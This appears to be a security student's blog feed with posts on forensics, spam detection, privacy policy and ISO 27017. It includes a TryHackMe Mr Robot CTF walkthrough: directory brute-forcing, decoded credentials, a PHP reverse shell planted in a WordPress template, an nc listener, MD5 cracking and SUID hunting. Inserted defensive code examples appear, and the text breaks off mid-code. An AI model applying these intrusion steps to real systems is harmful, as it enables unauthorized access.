<![CDATA[Blog of Shehan]]>https://shehansanjula.github.io/blog/https://shehansanjula.github.io/blog/favicon.pngBlog of Shehanhttps://shehansanjula.github.io/blog/Ghost 5.85Sat, 17 Jan 2026 12:59:30 GMT60<![CDATA[Challenges of Cloud Forensics]]>https://shehansanjula.github.io/blog/challenges-of-cloud-forensics/63c3a82da4552e005506104cSun, 31 Jul 2022 16:22:22 GMT
Challenges of Cloud Forensics

This is an individual assignment that I did under the Cyber Forensics and Incident Response module when I was in the 4th year 1st semester. The purpose of this assignment is to demonstrate the challenges associated with cloud forensics through a video.



[embedded video: Challenges of Cloud Forensics]

]]>
<![CDATA[Spam Detection in Email using Machine Learning]]>https://shehansanjula.github.io/blog/spam-detection-in-email-using-machine-learning/63c3a82da4552e005506104bSun, 31 Jul 2022 13:13:54 GMT Spam Detection in Email using Machine Learning

This is an individual assignment that I did under the Machine Learning for Cyber Security module when I was in the 4th year 1st semester. This mini research paper covers the end-to-end implementation of spam detection in email using machine learning: Python, Flask, Gunicorn, Scikit-Learn and Logistic Regression on the Heroku cloud application platform.

Paper on Academia.edu: R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology

🏆 Top 2%

In today's world, email is used in almost every industry, from business to education. Emails can be categorized into two categories: ham and spam. Junk emails, also known as spam messages, are emails designed to harm recipients by wasting their time and computing resources and by stealing their valuable information. It is estimated that spam emails are increasing at a rapid rate. One of the most important and prominent spam prevention techniques is email filtering. Naive Bayes, Decision Trees, Neural Networks, and Random Forests are among the methods researchers use for this purpose. In this project, I examine the Logistic Regression machine learning model for spam filtering in email by categorizing messages into the appropriate groups. This study also compares the techniques based on accuracy, precision, recall, etc. The accuracy level for this project was around 97%. Towards the end, insights, future research directions and challenges are outlined. Read more...👇
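As an added illustration of the approach the abstract describes (this is not code from the paper or its repository), here is a minimal bag-of-words logistic regression spam filter in plain Python with accuracy, precision and recall scoring. The training messages are constructed, and the learning rate and epoch count are my own choices; the real project uses Scikit-Learn on a much larger corpus, which is where the 97% figure comes from.

```python
"""Toy end-to-end spam filter: bag-of-words features, logistic regression
trained by plain gradient descent, and accuracy/precision/recall scoring.
Added example, not the project's code; the corpus below is constructed."""
import math
import re
from collections import Counter

# Constructed training corpus: label 1 = spam, 0 = ham.
TRAIN = [
    ("win a free prize now click here", 1),
    ("free money claim your prize today", 1),
    ("urgent click here to claim cash", 1),
    ("cheap pills buy now free shipping", 1),
    ("meeting tomorrow at ten please confirm", 0),
    ("please review the attached report", 0),
    ("lunch at noon tomorrow with the team", 0),
    ("can you confirm the report by monday", 0),
]


def tokenize(text):
    """Lowercase and split into alphanumeric tokens."""
    return re.findall(r"[a-z0-9]+", text.lower())


def build_vocab(messages):
    """Map each distinct token to a feature index (insertion order)."""
    vocab = {}
    for text in messages:
        for tok in tokenize(text):
            vocab.setdefault(tok, len(vocab))
    return vocab


def vectorize(text, vocab):
    """Bag-of-words count vector; tokens outside the vocabulary are ignored."""
    counts = Counter(tokenize(text))
    return [float(counts.get(tok, 0)) for tok in vocab]


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


class LogisticRegression:
    """Binary logistic regression, full-batch gradient descent on log-loss."""

    def __init__(self, n_features, lr=0.5, epochs=300):
        self.w = [0.0] * n_features
        self.b = 0.0
        self.lr = lr
        self.epochs = epochs

    def predict_proba(self, x):
        return sigmoid(sum(wj * xj for wj, xj in zip(self.w, x)) + self.b)

    def predict(self, x):
        return 1 if self.predict_proba(x) >= 0.5 else 0

    def fit(self, X, y):
        n = len(X)
        for _ in range(self.epochs):
            grad_w = [0.0] * len(self.w)
            grad_b = 0.0
            for xi, yi in zip(X, y):
                err = self.predict_proba(xi) - yi  # d(log-loss)/dz
                for j, xij in enumerate(xi):
                    grad_w[j] += err * xij
                grad_b += err
            self.w = [wj - self.lr * gj / n for wj, gj in zip(self.w, grad_w)]
            self.b -= self.lr * grad_b / n


def evaluate(y_true, y_pred):
    """Accuracy, precision and recall with spam as the positive class."""
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    return {
        "accuracy": sum(1 for t, p in zip(y_true, y_pred) if t == p) / len(y_true),
        "precision": tp / (tp + fp) if tp + fp else 0.0,
        "recall": tp / (tp + fn) if tp + fn else 0.0,
    }


def train_spam_filter():
    vocab = build_vocab(t for t, _ in TRAIN)
    model = LogisticRegression(len(vocab))
    model.fit([vectorize(t, vocab) for t, _ in TRAIN], [y for _, y in TRAIN])
    return model, vocab


def classify(model, vocab, text):
    return "spam" if model.predict(vectorize(text, vocab)) else "ham"


def training_metrics():
    model, vocab = train_spam_filter()
    preds = [model.predict(vectorize(t, vocab)) for t, _ in TRAIN]
    return evaluate([y for _, y in TRAIN], preds)


if __name__ == "__main__":
    model, vocab = train_spam_filter()
    print(training_metrics())
    for msg in ("claim your free prize", "please confirm the meeting"):
        print(msg, "->", classify(model, vocab, msg))
```

Running it as a script prints the training-set metrics and two classifications. Precision and recall matter more than raw accuracy for a filter: a false positive hides a legitimate message, so a deployment would tune the 0.5 decision threshold on held-out data rather than use the default.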


Spam Email Filtering System

Deployed Model: View Web App | Status: Offline

For an information security analyst, email is a very important communication tool, and spam filtering is one important feature for keeping that communication effective. How exactly does a spam filtering system work? Is it possible to build a more effective spam filtering system from scratch?

Project page: Shehan Sanjula | Spam Detection in Email using Machine Learning. Hi, there! 👋🏻 Here, you can find about one of Shehan's Machine Learning projects. Shehan Sanjula is an information security enthusiast who is reading a degree in cyber security at Sri Lanka Institute of Information Technology.

Cloud Web Application

Official GitHub Repository: ShehanSanjula/Spam-Email-Filtering-System-Public (end-to-end implementation of Spam Detection in Email using Machine Learning, Python, Flask, Gunicorn, Scikit-Learn, and Logistic Regression on the Heroku cloud application platform).

]]>
<![CDATA[Tips to maintain your mental health on social media without being a victim of cyberspace]]>https://shehansanjula.github.io/blog/cyber-guardian-enews-letter-march/63c3a82da4552e005506104aWed, 16 Mar 2022 16:35:00 GMTThis is an article written by me that was published in the Cyber Guardian magazine, issue 128, March 2022. You can read the full article here.

Cyber Guardian eNews Letter - March 2022

💡
This article was brought to you by Sri Lanka Computer Emergency Readiness Team | Coordination Centre
]]>
<![CDATA[Introduction to privacy policy implementation in organisations]]>
]]>
https://shehansanjula.github.io/blog/privacy-policy-implementation-in-organizations/63c3a82da4552e0055061043Sun, 28 Nov 2021 12:30:00 GMT
A privacy policy is an asset to every organisation, and it is the responsibility of organisations to protect the privacy of their employees. Privacy has been a critical term in news media and has become a target of legislation worldwide in recent years. Most organisations have been facing lawsuits because of errors in their privacy policy mechanisms. This article presents a brief overview of such violations and how to overcome them by implementing a proper privacy policy for the organisation. In my view, a well-developed and well-implemented privacy policy effectively protects the organisation, its resources and its stakeholders. This article briefly examines the statistics, significance, strengths and weaknesses, and recommendations for implementing a privacy policy in an organisation. By providing such views, I hope to help the reader understand privacy policy implementation in an organisation better.
Introduction to privacy policy implementation in organisations

Keywords: privacy policy, history, statistics, significance, strengths and weaknesses,  recommendations

An overview of the privacy policy implementation in organisations

Every day, an unimaginable amount of data flows from the workplace to the Internet and vice versa. Each piece of this data leaves behind, on electronic devices, trails of various user activities such as everyday conversations with people, sensitive personal information, and monetary transactions. When this sort of data is properly collected, stored and processed, it allows organisations to understand employee and customer behaviours and preferences. The way an organisation manages the personally identifiable information that it gathers and uses in the regular course of business, together with the written, published statements that explain the organisation's position on this matter, is what we call the privacy policy.

However, privacy remains the most prominent issue to be solved in how companies access, collect, process, use, analyse, share and disseminate such private information about their employees. This concern has come to attention because incidents of privacy invasion and online information leaks have increased over the years. Where privacy policy violations are concerned, those incidents have had adverse effects even for well-recognised companies in the world. Ultimately, those organisations had to pay fines in lawsuits as the price.

To prevent such violations and penalties, organisations tend to monitor employee communications carefully. When they implement policies for such actions, most employers have their staff and the organisation in mind while pursuing the organisation's common goals. It has been noticed that employee privacy is the priority in these discussions; at their core, they believe in the need for security and safety in such situations.

When it comes to the privacy policy implementation at the workplace, Nancy Flynn, the Executive Director of the ePolicy Institute, states that,

To help control the risk of litigation, security breaches and other electronic disasters, employers should take advantage of monitoring and blocking technology to battle people problems—including the accidental and intentional misuse of computer systems and other electronic resources.

Knowing that someone is always watching, what could be monitored, and what types of surveillance technologies exist can motivate people to give their best at the workplace.

Types of technologies that can be used for surveillance at the workplace:

  • CCTV
  • Background check software
  • Biometric technology (facial recognition, fingerprints, and voice recognition, etc.)
  • Modern cloud-based access control platforms
  • Real-time location tracking (to monitor company assets and endpoint devices within a network)
  • Social Media Monitoring software (SMMs)
  • Identity management systems
  • Occupancy tracking (a series of sensors that measure how many people are present in a specific area of the workplace and how long they spend there)
  • Screen capture/browser monitoring
  • Workplace analytics audit logs

According to the Privacy Rights Clearinghouse, here is the list of things that an organisation is generally permitted to monitor in the workplace:

[image: the list appears in an image that is not reproduced here]

The "2007 Electronic Monitoring & Surveillance Survey", co-sponsored by the American Management Association and the ePolicy Institute, listed many privacy policy violations at organisations in its report. Among them, 64% of employees violated company policies under the heading "any company policy violation" in the category of Email and Internet-Related Terminations. It is not only employees who violate company policies: the report also notes that 48% of bosses violated company policies under the same heading and category.

They also report that "45% of employers tracking content, keystrokes, and time spent at the keyboard, 43% store and review computer files, 12% monitor the blogosphere to see what is being written about the company and 10% monitor social networking sites". All of these fall under the category of computer monitoring at the organisation.

So, it is evident that there are several things to consider in order to implement a better privacy policy. Ultimately, a well-documented privacy policy should consider all the above requirements and protect both the organisation and the individuals it affects. It will also automatically start earning the organisation public trust.

Strengths of privacy policy implementation

  • Having a privacy policy implemented into your organisational structure plays a vital part if you or your organisation collect, gather, process, store or manipulate customer data, because a privacy policy is a legal requirement when collecting personal information.
  • If the organisation uses any third-party application or service, that application or service will also require a privacy policy to be implemented in your organisation.
  • One of the main reasons is that users who are concerned about their privacy can get a clear idea of what information the organisation or service collects or processes, and decide whether to do further business with the organisation.

Weaknesses of privacy policy implementation

  • One of the main problems with privacy policy implementation is that it is not appropriately documented, including guidelines and procedures. This information about privacy policies should be accessible and adjustable in case of change.
  • Even though the privacy policy has connections all over the business, most businesses only tie the privacy policy into their IT security structure or their disaster recovery plan.
  • Although technology is updated rapidly over time, organisations usually do not update their privacy policy with the changes. Updating privacy policies and new implementations according to changes in privacy laws does not happen very often in most organisations.
  • When it comes to new implementations, the Internet of Things (IoT) and Bring-Your-Own-Device (BYOD) are generally harder to cover because they connect almost all devices to the internet and produce a vast amount of data to manage and process.
  • Most organisations apply the same privacy policy to all types of data, which is insufficient to cover and manage those categories.
  • After implementing privacy policies, organisations need to monitor and maintain the implementation without being breached. Since maintenance costs increase with the economy, organisations decide to automate processes instead of relying on the workforce, which reduces costs, improves control and governance, reduces human error, and increases efficiency.

Recommendations for privacy policy implementation

  • Do not use only legalese language.

One of the characteristics of a poor privacy policy is the use of legalese. The practice was (and continues to be) so widespread that the European privacy law - the GDPR - went to great lengths to make it clear that privacy policies written in non-plain language are in breach of the law. Transparency is the ultimate goal of a privacy policy.

  • Update privacy policy to match your data practices.

Regularly update the policies to the current practices. If you constantly update your privacy policy, you should inform your users via a privacy policy update notice and ask for consent a second time. Conduct a privacy law self-audit to make sure you have a good grasp of your business’s current privacy practices so you can accurately convey it in your privacy policy and update your policy if needed.

  • Do not miss essential clauses.

The privacy policy needs to strategically represent each of the ways you collect, use and store data. Businesses often omit some of the legislative clauses, such as the need to comply with the GDPR or COPPA.

There might be other clauses missing that result in the privacy policy being incomplete. These often relate to moving or sharing your data with a third party. For example, if you transfer data to another country, you need to say so in your privacy policy. You mainly need this clause if you must comply with the GDPR. Another essential clause frequently missed by privacy policies is the business transfer clause. It states that you will pass the database and its contents over to the new owner if you sell your business. Even if you don't plan to market your business, you benefit from having this clause.

  • Do not write an enormous block of text.

Not making a privacy policy easily readable is one of organisations' biggest mistakes when constructing their policies. Too many still use a 2000s-era format: big words, tiny print, and enormous, almost illegible blocks of text. Readability is increasingly governed by law, and where you market to children, you need to provide a privacy policy they can read.

  • Do not use one privacy policy for different users.

Organisations may have several different types of users: customers, developers, and partners. The way you use data changes based on how they use your service, so your privacy policy needs to reflect that. Including all three user categories in a single privacy policy makes the document long, complicated, and virtually unreadable. To keep it simple, you need a policy for each of your critical categories of users.

Use a separate privacy policy for:

  • Customers
  • Partners
  • Developers
  • General users ("Everyone")

Each privacy policy is found under its respective heading to clarify what data practices occur at each level.

  • Update employees about what's in your privacy policy.

You have a privacy policy, and it reflects your data practices on paper. But does your team know what is in your privacy policy, and, more importantly, does their lack of knowledge affect whether you uphold each clause as you should? Everyone who controls, processes, or accesses your data needs to know what is in your privacy policy, how it matches your operations, and what your consumers expect from you. That makes the privacy policy more than just a document: an authentic practice and a reflection of your professional methods.

So, we’ve come to the end of our article. I think you have learned something from this article regarding what you might need to consider when implementing a privacy policy in organisations.

Thank you, and let’s meet with another piece of paper. Until then, stay safe and bye 👋.


References

[1] "Justice Information Sharing | Bureau of Justice Assistance", Bureau of Justice Assistance, 2006.

[2] Y. Chang, S. Fan Wong and H. Lee, "Understanding Perceived Privacy: A Privacy Boundary Management Model", Core.ac.uk, 2015.

[3] S. Cox, T. Goette and D. Young, "Workplace Surveillance and Employee Privacy: Implementing an Effective Computer Use Policy", Scholarworks.lib.csusb.edu, 2005.

[4] "The State of Employee Privacy and Surveillance in 2021 | Kisi", Getkisi.com, 2021.

[5] "The Latest on Workplace Monitoring and Surveillance", Amanet.org, 2021.

[6] U. Hugl, "Approaching the value of Privacy: Review of theoretical privacy concepts and aspects of privacy management", AMCIS 2010 Proceedings, 2010.

[7] B. Kint, "5 Ways Your Company’s Privacy Policy Could Be Insufficient", Corporate Compliance Insights, 2019.

[8] Cloverdx.com, "The 8 Most Challenging Data Privacy Issues (and How to Solve Them)", 2020.

[9] B. Kint, "5 Ways Your Company’s Privacy Policy Could Be Insufficient", Corporate Compliance Insights, 2019.

[10] S. Sanjula, S. Fonseka, S. Wijeveera, I. Anjana, U. Madushantha, "Privacy Policy implementation in organisations", ISPM, 2021.

]]>
<![CDATA[ISO/IEC 27017 — Implementation]]>https://shehansanjula.github.io/blog/iso-iec-27017-implementation/63c3a82da4552e0055061049Tue, 05 Oct 2021 03:41:20 GMTThis is an individual assignment that I did under the Enterprise Standards for Information Security module when I was in the 3rd year 2nd semester. It is basically a toolkit I prepared for the ISO/IEC 27017:2015 standard. Here I will share a brief overview of the toolkit implementation.

Acknowledgement


I thank Mr Kanishka Yapa, (Sri Lanka Institute of Information Technology) the lecturer in charge, for granting us a chance to conduct this toolkit implementation with guidance. This work was supported in part by the Research Groups Faculty of Computing, Department of Computer Systems Engineering under Grant Enterprise Standards for Information Security - IE3102.

A brief overview of ISO 27017

This security standard provides guidelines for information security controls applicable to the provision and use of cloud services. The objectives of operations security are to support the planning and sustaining of day-to-day processes that are critical concerning the security of information environments. As the name suggests, this is a standard related to cloud services.

Actually, it is an extension of ISO-27002 incorporating clauses specific to information security in the context of the cloud. This standard provides guidance on the information security aspects of cloud computing, recommending and assisting with the implementation of cloud-specific information security controls supplementing the guidance in ISO/IEC 27002 and other ISO27k standards such as ISO 27001, etc.

The cloud service customers and the cloud service providers can refer to ISO/IEC 27002 and this Recommended International Standard ISO/IEC 27017 to select controls with the implementation guidance, and add other controls if necessary. This process can be done by performing an information security risk assessment and risk treatment in the organizational and business context where cloud services are used or provided. So, that's the basic understanding of the ISO 27017 standard.




Since it's a lengthy process, I'm not planning to discuss the implementation process from top to bottom here. Nevertheless, you can get a clear idea by referring to the slides above. You can send me an email requesting the ISO/IEC 27017 toolkit. It includes documentation, Excel workbooks and presentations: the guidance video, business case, SOA, checklist, DR, policy, and so on.

Stay with the Blog of Shehan for more updates!

]]>
<![CDATA[Mr Robot CTF on TryHackMe]]>https://shehansanjula.github.io/blog/mr-robot-ctf-on-tryhackme/63c3a82da4552e0055061047Fri, 01 Oct 2021 13:06:00 GMT
Mr Robot CTF on TryHackMe

Based on the Mr. Robot show, can you root this box?

TryHackMe is an amazing platform to learn cyber security and it’s an amazing asset if you are new to it and don’t know where to start. They have something called rooms that are basically vulnerable machines that you can deploy and practice your skills.

The best part about TryHackMe is that it’s pretty hands-on. If you are new to security, make sure you give it a try. In this article, we are going to solve the Mr Robot CTF from TryHackMe. This room has three flags to retrieve from the target. 🙂

Difficulty: Medium

  1. Connect to TryHackMe network

To deploy the Mr Robot virtual machine, we will first need to connect to the TryHackMe network. In this write-up, I am going to use the OpenVPN client to connect.

Go to your access page and download your configuration file.

Mr Robot CTF on TryHackMe

After downloading the .ovpn file, now we can create our OpenVPN session.

sudo openvpn CONFIG_FILE_NAME.ovpn

After running this command, you'll get an output like below.

2021-xx-xx xx:xx:xx Initialization Sequence Completed

It means that you have successfully connected to TryHackMe through the VPN connection. You can verify it by navigating to the TryHackMe access page.

Mr Robot CTF on TryHackMe

Enough talk 🥱, let's get started hacking. 🐱‍💻

  2. Start the Machine

Now, click on the Start Machine button mentioned on TryHackMe task 2.

Mr Robot CTF on TryHackMe
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤

Enumeration

As always, let's start with the Nmap scan.

nmap -sC -sV 10.10.xxx.xxx
-sC	: Launch default NSE nmap scripts
-sV	: Service fingerprinting

Here is the output 👇

Starting Nmap 7.91 ( https://nmap.org ) at 2021-xx-xx xx:xx EDT
Nmap scan report for 10.10.xxx.xxx
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.97 seconds

Nmap reveals three ports, two of which are open (HTTP and HTTPS); SSH appears to be closed.

Mr Robot CTF on TryHackMe

Getting the first key

Now that we know the target is running a web server, we should run a directory brute-force scan to see what's available. You can use gobuster or dirb, but I like to use DirBuster. (In the following steps, I will show you how to do it with both DirBuster and gobuster.)

Similar in concept to password brute-forcing, we take a list of words contained in a file and use them as request paths against the web server. If a request returns a 20x or 30x status code, we know something is there.
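From the defender's side, the same behaviour is easy to spot in the web server's logs: one client requesting many distinct paths in a short time, most of them answered with 404. The detection below is an added example, not part of this write-up; it parses Apache combined-format access log lines (the sample lines, client addresses and user agent are constructed) and flags any client whose recent requests are mostly not-found responses.

```python
"""Flag directory brute-forcing (gobuster/DirBuster style) in Apache
combined-format access logs: one client requesting many distinct paths in a
short window, most of them answered with 404. Added example; the sample log
lines, client addresses and user agent are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforcers(lines, window=timedelta(seconds=60),
                      min_requests=20, min_404_ratio=0.8):
    """Slide a time window over each client's requests and alert when a window
    holds at least min_requests requests of which at least min_404_ratio are 404s.
    Returns {ip: summary of the largest offending window}."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            win = recs[start:end + 1]
            if len(win) < min_requests:
                continue
            ratio = sum(1 for r in win if r["status"] == 404) / len(win)
            if ratio < min_404_ratio:
                continue
            prev = alerts.get(ip)
            if prev is None or len(win) > prev["requests"]:
                alerts[ip] = {
                    "requests": len(win),
                    "distinct_paths": len({r["path"] for r in win}),
                    "not_found_ratio": round(ratio, 2),
                    "user_agent": win[-1]["ua"],
                }
    return alerts


def make_sample_log():
    """Constructed sample: a scanner walking 30 wordlist entries in 30 seconds
    (two of them exist on the site) and a normal visitor making five requests."""
    base = datetime(2021, 10, 1, 13, 6, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 209 "-" "{ua}"'
    lines = []
    for i in range(30):
        path, status = {3: ("/wp-admin", 301), 17: ("/license", 200)}.get(i, (f"/word{i}", 404))
        lines.append(fmt.format(ip="10.0.0.5", ts=(base + timedelta(seconds=i)).strftime(TS_FMT),
                                path=path, status=status, ua="Mozilla/5.0 (constructed scanner)"))
    for i, path in enumerate(["/", "/index.html", "/style.css", "/robots.txt", "/"]):
        lines.append(fmt.format(ip="10.0.0.9", ts=(base + timedelta(seconds=10 * i)).strftime(TS_FMT),
                                path=path, status=200, ua="Mozilla/5.0 (constructed browser)"))
    return lines


if __name__ == "__main__":
    for ip, info in find_bruteforcers(make_sample_log()).items():
        print(ip, info)
```

The thresholds (20 requests in 60 seconds, 80% not-found) are deliberately simple; on a real site they should be tuned against normal traffic, and the rule pairs well with the observation that the two hits that did succeed (/wp-admin, /license) are exactly the paths a defender would want to review next.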

Using dirbuster:

Run the dirbuster command in your terminal. It opens the DirBuster GUI, where you can enter the target information to scan as follows.

[screenshot: DirBuster target and wordlist settings]

After the third step, wait for the scan to complete; eventually you can generate a report.

Using gobuster:

gobuster dir -u 10.10.xxx.xxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[screenshot: gobuster output]

Even though these scans can take some time, if you prefer to use the hint on TryHackMe, you can guess the file/path without much effort from a directory discovery tool.

However, assisted by the hint, let's go and see what's inside the robots.txt file. It discloses two hidden files, one of which is key 1. (073xxxxxxxxxxxxxxxx)


The second file is a dictionary, that we will probably need to use for the discovery of other locations.

┌──(shehan㉿shehansanjula)-[~/TryHackMe/Mr Robot CTF]
└─$ curl -s http://10.10.xxx.xxx/fsocity.dic | head
true
false
wikia
from
the
now
Wikia
extensions
scss
window

Getting the second key

gobuster has discovered several locations, including:

  • /login (Status: 302)
  • /wp-content (Status: 301)
  • /admin (Status: 301)
  • /wp-login (Status: 200)
  • /license (Status: 200)
  • /wp-includes (Status: 301)
  • /wp-admin (Status: 301)

By examining some of these directories, I found that /license discloses some credentials:

curl -s http://10.10.xxx.xxx/license | tr -d "\n"                   
tr	-> translate or delete characters
-d	-> delete characters in SET1, do not translate
\n	-> new line

Here is the output 👇

[screenshot: output of the curl command]

It looks like a Base64-encoded string. 🧐

echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d

Here is the output 👇

elliot:ER28-0652

If you have seen the Mr Robot TV series, probably you would have identified who that is. 🤖 Yeah, that's Elliot!

Let's check these credentials against WordPress login.
Well, it worked. 🤠 We just got access to the WordPress dashboard panel.


The WordPress version is 4.3.1. Considering the current version is 5.8.1, we are likely to find vulnerabilities.

After snooping around a bit, I found out Elliot is an administrator of this website. As we are administrators, we can modify the templates.

First, download the script:

wget https://raw.githubusercontent.com/ShehanSanjula/php-reverse-shell/master/php-reverse-shell.php

Go to Appearance > Editor and edit the first template (404.php), replacing the PHP code with the reverse shell taken from trusty PentestMonkey. Make sure you put in your VPN interface IP.

Type ifconfig tun0 to find it, and replace the IP and port in the script (you can specify any port you are using for your reverse TCP shell).

If you are using an Uncomplicated Firewall, remember to add a rule for your port.


After replacing the 404.php code, hit Update in WordPress. To listen for the connection, I always use the swiss army knife tool, netcat. 👽

Now open a listener:

nc -lvnp 443
-l	-> listen mode
-v	-> verbose
-n	-> numeric-only IP addresses, no DNS
-p	-> local port number

Now visit http://10.10.xxx.xxx/404.php to open the reverse shell.

We can see our next key in /home/robot but it is only readable by the robot user.


We are also provided with the MD5 hash of the robot user's password:

$ cd /home/robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Cracking this MD5 hash gives the string abcdefghijklmnopqrstuvwxyz.

It could be the associated password. So, let’s try to log in as robot.

$ su - robot
su: must be run from a terminal

Well, we got an error... 😈 Fine, let's check whether python is installed; if so, we can spawn a proper terminal with python. 😇

$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot 
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822xxxxxxxxxxxxxxxxxxxx
$ 
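The password.raw-md5 file above is the weak practice that made this step trivial: unsalted, single-round MD5, so the digest of a common string is the same everywhere and a wordlist check matches it instantly. The added example below (not from the write-up) confirms the digest shown above and contrasts it with salted PBKDF2-HMAC-SHA256 from Python's standard library; the iteration count and salts are my own choices, and only the robot:<md5> record comes from the page.

```python
"""Why a raw MD5 password file is trivial to recover, and what a salted,
iterated hash changes. Added example; only PAGE_RECORD comes from the write-up."""
import hashlib
import hmac
import os

PAGE_RECORD = "robot:c3fcd3d76192e4007dfb496cca67e13b"  # contents of password.raw-md5


def raw_md5(password):
    """Unsalted, single-round MD5: the same input always gives the same digest,
    so precomputed tables and fast wordlist checks apply directly."""
    return hashlib.md5(password.encode()).hexdigest()


def md5_record_matches(record, candidate):
    """Compare a candidate against a user:md5 record in constant time."""
    _user, digest = record.split(":", 1)
    return hmac.compare_digest(digest, raw_md5(candidate))


def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256. The stored string carries the algorithm, the
    work factor and the salt, so each can be checked and upgraded later.
    (Assumed format; iteration count is a choice, not a page value.)"""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored, candidate):
    """Recompute with the stored salt and work factor; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    pw = "abcdefghijklmnopqrstuvwxyz"
    print("raw md5 matches record:", md5_record_matches(PAGE_RECORD, pw))
    stored = hash_password(pw)
    print("salted record:", stored)
    print("verify correct / wrong:", verify_password(stored, pw), verify_password(stored, pw + "1"))
```

Two things to notice when running it: the raw digest is identical to the one on the box (it is also the RFC 1321 test vector for the alphabet string), and hashing the same password twice with the salted scheme produces two different records, which is what defeats precomputed tables.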

Getting the third key

Our last key is very likely in the /root directory, and we will need a privilege escalation to access it.
The Nmap scan reveals that port 22 (ssh) is closed, probably because the service is not started. We need to elevate our privileges.
Unfortunately, our user robot is not in the sudoers:

The /etc/sudoers file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands.
$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.
$ 

No need to worry, let’s find what programs we have with the SETUID bit set owned by root:

$  find / -user root -perm -4000 -print 2>/dev/null
 find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

As I guessed, Nmap is on the list (it's also the hint, by the way). 😋

Besides, it’s a very old release (3.81), considering that the current release is 7.92 at the time of this writing.

$ which nmap
which nmap
/usr/local/bin/nmap
$ nmap --version
nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

Older Nmap releases (2.02 to 5.21) had an interactive mode that allows executing commands.
Since this Nmap binary has the SETUID bit set, those commands run as root:

$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
setuid: a bit that makes an executable run with the privileges of the file's owner
setgid: a bit that makes an executable run with the privileges of the file's group
sticky bit: a bit set on directories so that only a file's owner (or root) can delete or rename files and subdirectories in them
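Reading those bits off a listing is mechanical, and an audit that compares setuid-root binaries against a known-good list is how a defender would catch /usr/local/bin/nmap before anyone else does. The following is an added example (not from the write-up): a parser for `ls -l` mode strings plus such an audit. The allowlist and the sample listing are constructed; only the nmap line is the one shown above, and the other paths are taken from the find output.

```python
"""Decode setuid/setgid/sticky bits from `ls -l` output and flag setuid-root
files that are not on a known-good list. Added example; the allowlist and the
sample listing (except the nmap line) are constructed."""
import re

# mode links owner group size month day year-or-time path
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)


def parse_mode(mode):
    """Decode a 10-character mode string such as '-rwsr-xr-x'.
    Lowercase s/t means the special bit plus execute; uppercase S/T means the
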